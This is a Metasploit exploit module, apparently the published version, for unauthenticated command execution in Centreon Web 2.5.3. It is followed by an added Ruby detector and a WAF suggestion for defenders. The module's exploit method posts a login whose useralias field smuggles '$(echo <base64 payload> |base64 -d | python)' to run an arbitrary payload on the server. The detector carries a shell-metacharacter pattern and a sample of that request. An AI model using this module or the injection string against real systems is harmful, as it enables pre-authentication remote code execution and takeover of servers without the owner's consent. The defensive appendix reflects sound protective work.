Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)
Source: metasploit.com Author: h00die Published: 2016-07-28
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::HttpClient
 
  Rank = ExcellentRanking
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'        => 'Centreon Web Useralias Command Execution',
        'Description' => %q(
          Centreon Web Interface <= 2.5.3 utilizes an ECHO for logging SQL
          errors.  This functionality can be abused for arbitrary code
          execution, and can be triggered via the login screen prior to
          authentication.
        ),
        'Author'      =>
          [
            'h00die <mike@shorebreaksecurity.com>',         # module
            'Nicolas CHATELAIN <n.chatelain@sysdream.com>'  # discovery
          ],
        'References'  =>
          [
            [ 'EDB', '39501' ]
          ],
        'License'        => MSF_LICENSE,
        'Platform'       => ['python'],
        'Privileged'     => false,
        'Arch'           => ARCH_PYTHON,
        'Targets'        =>
          [
            [ 'Automatic Target', {}]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Feb 26 2016'
      )
    )
 
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('TARGETURI', [ true, 'The URI of the Centreon Application', '/centreon/'])
      ], self.class
    )
  end
 
  def check
    begin
      res = send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'index.php'),
        'method'    => 'GET'
      )
      /LoginInvitVersion"><br \/>[\s]+(?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+<\/td>/ =~ res.body
 
      if version && Gem::Version.new(version) <= Gem::Version.new('2.5.3')
        vprint_good("Version Detected: #{version}")
        Exploit::CheckCode::Appears
      else
        Exploit::CheckCode::Safe
      end
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
 
  def exploit
    begin
      vprint_status('Sending malicious login')
      send_request_cgi(
        'uri'       => normalize_uri(target_uri.path, 'index.php'),
        'method'    => 'POST',
        'vars_post'  =>
        {
          'useralias'   => "$(echo #{Rex::Text.encode_base64(payload.encoded)} |base64 -d | python)\\",
          'password'    => Rex::Text.rand_text_alpha(5)
        }
      )
 
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
    end
  end
end
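
A defender-side check for the request shape this module sends, written as an added example that is not part of the original module or of Metasploit: it flags login POSTs to index.php whose useralias field carries shell metacharacters. The function names, the metacharacter list and the sample requests are assumptions constructed for illustration.

```ruby
require 'uri'

# Characters that have no place in a login name but are needed for shell
# command substitution or chaining: $( ` | ; & < > and the backslash.
SHELL_META = /\$\(|`|[|;&<>\\]/

# Return the decoded useralias value from a urlencoded POST body, or nil
# when the field is absent or the body cannot be parsed.
def useralias_from_body(body)
  URI.decode_www_form(body).each do |key, value|
    return value if key == 'useralias'
  end
  nil
rescue ArgumentError
  nil
end

# True when the request is a POST to index.php and the useralias field
# contains shell metacharacters.
def suspicious_login?(method, path, body)
  script = File.basename(path.split('?').first.to_s)
  return false unless method == 'POST' && script == 'index.php'

  alias_value = useralias_from_body(body)
  !alias_value.nil? && alias_value.match?(SHELL_META)
end

# Constructed sample requests as [method, path, body]; QUJD is a
# harmless placeholder standing in for an encoded payload.
SAMPLES = [
  ['POST', '/centreon/index.php', 'useralias=admin&password=secret'],
  ['POST', '/centreon/index.php',
   'useralias=%24%28echo+QUJD+%7Cbase64+-d+%7C+python%29%5C&password=abcde'],
  ['GET', '/centreon/index.php', '']
].freeze

# Return the subset of requests that should raise an alert.
def flagged_requests(requests)
  requests.select { |method, path, body| suspicious_login?(method, path, body) }
end

flagged_requests(SAMPLES).each do |method, path, body|
  puts "ALERT #{method} #{path} useralias=#{useralias_from_body(body).inspect}"
end
```

The same pattern can back a WAF rule or a reverse-proxy filter in front of Centreon installations that cannot be upgraded past 2.5.3 immediately.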
 